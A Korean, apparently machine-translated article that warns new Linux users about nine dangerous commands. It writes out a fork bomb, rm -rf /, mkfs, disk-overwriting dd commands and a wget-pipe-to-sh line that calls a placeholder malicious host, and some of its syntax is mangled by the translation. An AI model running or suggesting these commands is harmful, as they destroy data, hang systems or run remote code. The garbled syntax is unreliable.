9 조심해야 할 리눅스 명령과 코드
리눅스 셸 / 터미널 명령은 매우 강력합니다. 간단한 명령만으로도 폴더, 파일 또는 루트 폴더 등을 삭제할 수 있습니다..
어떤 경우에는 리눅스가 확인을 요구하지 않고 명령을 즉시 실행하여 소중한 데이터와 정보를 잃어 버린다. 이 파일들과 폴더들에 저장 됨.
사람들이 웹에 콘텐츠를 게시하는 것은 일반적입니다. 이 명령을 실행하는 새로운 Linux 사용자 권장. 이것은 내용을 게시 한 누군가를위한 농담 같이 보일지도 모르지만 반대쪽에있는 사람에게는 웃기는 일이 아닙니다..
우리는 여러분의 시스템에 피해를 줄 수있는 매우 위험한 몇 가지 리눅스 명령어를 모았습니다. 그들은 실제로 위험하다는 것을 명심하십시오. 새로운 명령을 만들기 위해 다양한 방법으로 변경 될 수 있습니다 더 많은 피해를 입히다..
주목해야 할 중요한 점은 이들 명령 중 일부는 Ubuntu에서 sudo를 접두사로 사용하는 경우에만 위험합니다.. 리눅스의 다른 배포판에서는 이러한 명령의 대부분이 루트로서 실행하기에 위험합니다.
살펴보기 실행을 피해야하는 9 개의 명령어와 코드.
1. 리눅스 포크 폭탄 명령
: () : | : & ;:
또한 ~으로 알려진 포크 폭탄 Linux 시스템에 대한 서비스 거부 공격. : () : | : & ;:
bash 함수입니다. 일단 실행되면, 시스템이 정지 할 때까지 여러 번 반복됩니다..
시스템을 다시 시작해야만 제거 할 수 있습니다. Linux 쉘에서이 명령을 실행할 때주의하십시오..
2. mv 폴더 / dev / null 명령
mv 폴더 / dev / null
또 다른 위험한 명령이다.. 데브 / null
또는 널 장치
~이다. 기록 된 모든 데이터를 폐기하지만 쓰기 작업이 성공적으로 수행되었다고보고하는 장치 파일. 그것은 또한으로 알려져 있습니다 비트 버클 또는 블랙홀.
3. rm -rf 명령
RM -RF
명령은 빠른 방법입니다. 폴더와 그 내용을 지우다. Linux 운영 체제에서. 올바르게 사용하는 방법을 모른다면 시스템에 매우 위험 할 수 있습니다. rm-rf 명령과 함께 사용되는 가장 일반적인 조합 및 옵션은 다음과 같습니다.
RM
명령은 Linux 시스템에서 파일을 삭제하는 데 사용됩니다..rm -f
명령은 메시지를 표시하지 않고 폴더의 읽기 전용 파일을 제거합니다..rm -r
명령은 폴더의 내용을 재귀 적으로 삭제합니다..rm -d
명령은 빈 디렉토리를 제거하는 데 사용되지만 디렉토리가 비어 있지 않으면 디렉토리 제거를 거부합니다..rm -rf /
명령은 루트 디렉토리와 하위 폴더에있는 모든 내용의 강제 삭제 (쓰기 보호 된 경우에도 삭제)에 사용됩니다..rm -rf *
명령은 현재 디렉토리 (현재 작업중인 디렉토리)와 하위 폴더의 모든 내용을 강제로 삭제하는 데 사용됩니다.RM -RF.
명령은 현재 폴더 및 하위 폴더의 모든 내용을 강제로 삭제하는 데 사용됩니다. 그만큼rm -r. [^.] *
명령을 사용할 수도 있습니다..RM -i
명령은 파일 및 폴더 제거에 사용되지만 제거 전에 프롬프트가 나타납니다.
4. mkfs 명령
mkfs
리눅스 기반 시스템의 목적을 모를 경우 위험한 명령이 될 수 있습니다. mkfs 다음에 쓰여진 내용은 공백의 Linux 파일 시스템으로 포맷되고 대체됩니다..
아래에 언급 된 모든 명령은 하드 드라이브를 포맷하며 관리자 권한이 필요합니다.
mkfs
mkfs.ext3
mkfs.bfs
mkfs.ext2
mkfs.minix
mkfs.msdos
mkfs.reiserfs
mkfs.vfat
명령 mkfs.cramfs
위와 동일한 작업을 수행하지만 관리자 권한을 필요로하지 않습니다..
5. 타르 폭탄
그만큼 타르
명령은 여러 파일을 하나의 파일 (아카이브 파일)로 결합하는 데 사용됩니다. .타르 체재. 이 명령으로 테이프 아카이브 (Tar) 폭탄을 만들 수 있습니다..
그것은 기존 파일과 비슷한 이름으로 수천 또는 수백만 개의 파일로 압축되어 현재 디렉토리에있는 아카이브 파일 untarred 될 때 새로운 디렉토리보다는 오히려.
너는 타르 폭탄의 희생자가되는 것을 피할 수있다. tar 파일을받을 때마다 정기적으로 새로운 보호 디렉토리를 만듭니다. untarring하기 전에 수신 된 tar 파일을이 디렉토리로 옮긴다..
tar 파일이 실제로 tar 폭탄이라면 새로 생성 된 디렉토리를 제거하여 제거 할 수 있습니다. 타르 폭탄의 폭발을 피하는 또 다른 방법은 그만큼 -티
-tar 파일의 모든 내용을 나열하는 옵션 tar 파일에 포함 된 콘텐츠 유형에 대한 아이디어를 제공합니다..
6. dd 명령
그만큼 DD
명령은 하드 디스크 파티션 복사 및 변환. 그러나 잘못된 목적지를 지정하면 위험 할 수 있습니다..
명령은 다음 중 하나 일 수 있습니다.
dd if = / dev / hda of = / dev / hdb
dd if = / dev / hda of = / dev / sdb
dd if = something of = / dev / hda
dd if = something of = / dev / sda
다음 명령은 전체 기본 하드 드라이브를 0으로 만듭니다. dd if = / dev / zero of = / dev / had
7. 쉘 스크립트 코드
누군가 당신을 희생시킬 수 있습니다. 쉘 스크립트에 대한 링크를 제공하고 다운로드 및 실행을 보증합니다.. 스크립트에는 악의적이거나 위험한 코드가 들어있을 수 있습니다. 그만큼 명령 형식 다음과 같이 보일 수 있습니다. wget http : // some_malicious_source -O- | 쉬
. 그만큼 wget
sh가 스크립트 실행을 다운로드하는 동안 스크립트를 다운로드합니다..
8. 악성 코드
누군가 당신에게 소스 코드를 제공하고 그것을 컴파일하도록 요청합니다. 코드 정상적인 코드로 보일 수 있지만 실제로는 일부 악성 코드가 큰 소스 코드로 위장되어 있습니다. 시스템에 해를 끼칠 수 있습니다. 이런 종류의 공격으로 희생당하는 것을 피하려면, 신뢰할 수있는 출처의 소스 코드 만 받아들이고 컴파일하십시오..
9. 감압 폭탄
압축 파일을 받았으며이 파일의 압축을 풀라는 메시지가 표시됩니다.이 파일의 크기는 매우 작지만 크기는 몇 KB 정도입니다. 사실로, 이 작은 크기의 압축 파일에는 매우 압축 된 데이터가 들어 있습니다..
파일이 압축 해제되면 수백 GB의 데이터가 추출됩니다. 하드 드라이브를 가득 채울 수 있습니다. 시스템의 성능을 저하시킵니다. 이러한 상황을 피하려면 항상 신뢰할 수있는 출처의 데이터를 수락해야합니다..